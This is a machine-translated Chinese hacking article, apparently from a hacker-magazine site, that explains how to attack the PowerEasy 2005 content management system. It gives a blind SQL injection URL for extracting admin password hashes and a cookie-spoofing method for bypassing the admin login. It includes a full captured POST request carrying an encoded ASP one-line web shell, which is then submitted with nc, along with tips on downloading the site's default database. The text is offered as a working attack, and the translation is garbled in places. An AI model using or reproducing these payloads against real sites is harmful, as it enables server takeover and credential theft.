佚名MYHACK58:6220055896Moving-2 0 0 5 upload vulnerability-vulnerability warning-the black bar safety net
I haven’t writtenthe article, this text is mainly to explain two techniques: one is the dexterity of the injection; the second is not into the background subtly Upload a WebShell to. Hope all my friends can draw inferences, inappropriate please master exhibitions.
A, injection vulnerabilities
Because a friend wanted to help him see a station, filled with action-2005ACCESS Edition, before and LLIKZ found moving easy SQL Edition there is a short message injection vulnerability, because it can execute multiple statements, so use of them is relatively easy in ACCESS, there is also vulnerability due to the hand guess up more trouble, so it is a retain, ha ha to. This station exploits the same is in short the message of this place, except that it is ACCESS version, first register a user, and then login, if after entering the user control panel there is no short message function, you can try in the URL input<http://www.***. com/user/user_message. asp> give your own hair a short message and then in the deleting short messages, if we delete the short message to the number MessageID=1; after adding a semicolon, the system returns a“syntax error in query expression ‘its Incept=‘admin’ and ID in (4;)’.” Indicating the presence of injection vulnerabilities. As shown below:
Why the error message? We carefully look at the SQL in the back should be a collection, but the 4 behind a semicolon so that it does not appear a syntax error. After testing found that only the presence of a syntax error when the only error, which how can pass this error to achieve the injection? So think of the iif statement, the structure of the statement is as follows:/User/User_Message. asp? Action=Del&ManageType=Inbox&MessageID=1)and%2 0 1=(select%20top%2 0 1%20iif(asc(mid(password,1,1))<96,1,password)%20from%20pe_admin next to everyone’s analyze why you want to construct such a statement? Because according to the points number of the error situation of short message followed by a right parenthesis, to make up for in the conditions, so in the constructor of the injected statement MessageID=1 followed by a right parenthesis, the table name pe_admin behind why I didn’t add the right parentheses is because borrowed in the conditional statement of the right parenthesis. Next we look at the critical statement iif(asc(mid(password,1,1))<96,1,password), asc(mid(password,1,1))<9 6 mean determine the password field of the first bit of the ASCII value is greater than 9 6, the entire iif statement mean, if the password field of the first bit of the ASCII value is less than 9 6, return 1, otherwise return password. If it returns 1, the select statement returns the result is 1=1 So is right, will appear as shown below:
Conversely, if the if the password field of the first bit of the ASCII value is not less than 9 6, then return the value of field 1=psssword value will appear the following prompt:“the standard expression of the data type does not match.”
So that you can according to return different information for blasting.
Second, upload vulnerability
Above the injection finished, in to talk about how not into the background upload, here to provide you with an upload ideas–cookie spoofing formula upload. See about“the top section of the menu management”of the file Admin_RootClass_Menu. asp, include the following header file
//Database connection file
//Related function definitions file
//Check the administrative permissions of the file
//The top section of the Menu setting file
If it is determined that the administrator later, we set the parameters of the content written to the RootClass_Menu_Config. asp file, if to bypass Admin_ChkPurview. asp this file? Everyone to see it have such a code:
'Check whether the administrator login
AdminName = ReplaceBadChar(Trim(Request. Cookies(Site_Sn)(“AdminName”)))//administrator name
AdminPassword = ReplaceBadChar(Trim(Request. Cookies(Site_Sn)(“AdminPassword”)))//admin md5 password
RndPassword = ReplaceBadChar(Trim(Request. Cookies(Site_Sn)(“RndPassword”)))//Administrator a random password
The program is through these three variables determine whether an administrator, and they are in the Cookies made, so that we can capture the Cookie trick.
The specific method is: first in the local machine’s installed system, login backend, click on the top section of the menu Manager, the menu background picture: field, press the fill in the following code:
"%> <%'then packet capture is as follows:
POST /admin/Admin_RootClass_Menu. asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-powerpoint, application/vnd. ms-excel, application/msword, /
Referer: <http://178.126.0.234/admin/Admin_RootClass_Menu.asp?ChannelID=1>
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; . NET CLR 1.1.4322)
Host: 178.126.0.234
Content-Length: 1 0 0 9
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCSBQACQ=IFFFGAKDHJPAJJCCDGOKMOEN; SendMessage=Yes; 1 7 8 1 2 6 0 2 3 4=AdminName=admin&RndPassword=5748509MMHo36NDH&AdminPassword=469e80d32c0559f8&CookieDate=1; VisitNum=1
RCM_Menu_1=4&RCM_Menu_2=0&RCM_Menu_3=0&RCM_Menu_4=2&RCM_Menu_5=3&RCM_Menu_6=6&RCM_Menu_7=7&RCM_Menu_8=1 0 0&RCM_Menu_9=filter%3AGlow%28Color%3D%2 3 0 0 0 0 0 0%2C+Strength%3D3%2 9&RCM_Menu_10=4&RCM_Menu_12=2 3&RCM_Menu_13=5 0&RCM_Menu_14=2&RCM_Menu_15=4&RCM_Menu_16=%2 3 9 9 9 9 9 9&RCM_Menu_17=%23ffffff&RCM_Menu_18=%2 2% 2 5%3E%3CSCRIPT+RUNAT%3DSERVER+LANGUAGE%3DJAVASCRIPT%3Eeval%28Request. form%2 8%27yongger%2 7% 2 9%2B%2 7% 2 7% 2 9%3C%2FSCRIPT%3E%3C%2 5% 2 7&RCM_Menu_19=3&RCM_Menu_20=1&RCM_Menu_21=1&RCM_Menu_22=%23ACA899&RCM_Item_12=&RCM_Item_13=&RCM_Item_14=0&RCM_Item_15=0&RCM_Item_16=0&RCM_Item_17=&RCM_Item_18=&RCM_Item_19=0&RCM_Item_20=0&RCM_Item_21=0&RCM_Item_22=0& RCM_Item_23=1&RCM_Item_24=%23F1F2EE&RCM_Item_25=1&RCM_Item_26=%23CCCCCC&RCM_Item_27=1&RCM_Item_28=&RCM_Item_29=&RCM_Item_30=3&RCM_Item_32=0&RCM_Item_33=0&RCM_Item_34=%23FFFFF7&RCM_Item_35=%23FF0000&RCM_Item_36=%2 3 0 0 0 0 0 0&RCM_Item_37=%23CC0000&RCM_Item_38=9pt+%CB%CE%CC%E5&RCM_Item_39=9pt+%CB%CE%CC%E5& Action=SaveConfig&ChannelID=1&cmdSave=+%B1%A3%B4%E6%C9%E8%D6%C3+
Modify the capture content: Referer: <http://178.126.0.234/admin/Admin_RootClass_Menu. asp? ChannelID=1>and Host: 178.126.0.234 the host name into a target host name; 1 7 8 1 2 6 0 2 3 4=AdminName=admin&RndPassword=5748509MMHo36NDH&AdminPassword=469e80d32c0559f8 in addition to the AdminName And RndPassword and AdminPassword of the content into the target station, 1 7 8 1 2 6 0 2 3 4 This is a string of characters to be replaced by the target station of the url to remove the characters after that point in the content, and some friends maybe see 1 7 8 1 2 6 0 2 3 4 happens to be my IP to remove the point after the content, if you are address namewww.abc.comis changed as follows: wwwabccom, the change after the completion of the use of NC submission. Submission after a successful file RootClass_Menu_Config. asp content as shown below:
Three, moving easily upload vulnerability black anti-special edition
For the convenience of our friends use, and even compile a program, if the other party is the presence of injection vulnerabilities, the first registration of a user, save the cookies and send yourself a short message and then the Start point can be broke RndPassword and Password, the program no squib administrator user name users need their fill, and then click Upload, such as found in the dialog box“upload successful”, you can use ice Fox sentence the back door. With the progress the site information returned will be displayed in the following blank box.
Tips: many sites use the default database<http://www.***. com/database/powereasy5. mdb>thedownloaddirectly after the fill RndPassword,Password and the administrator name you can upload the back door.
Disclaimer: use this program is selected as the negative consequences of self-pay, with the author and black anti - - independent of!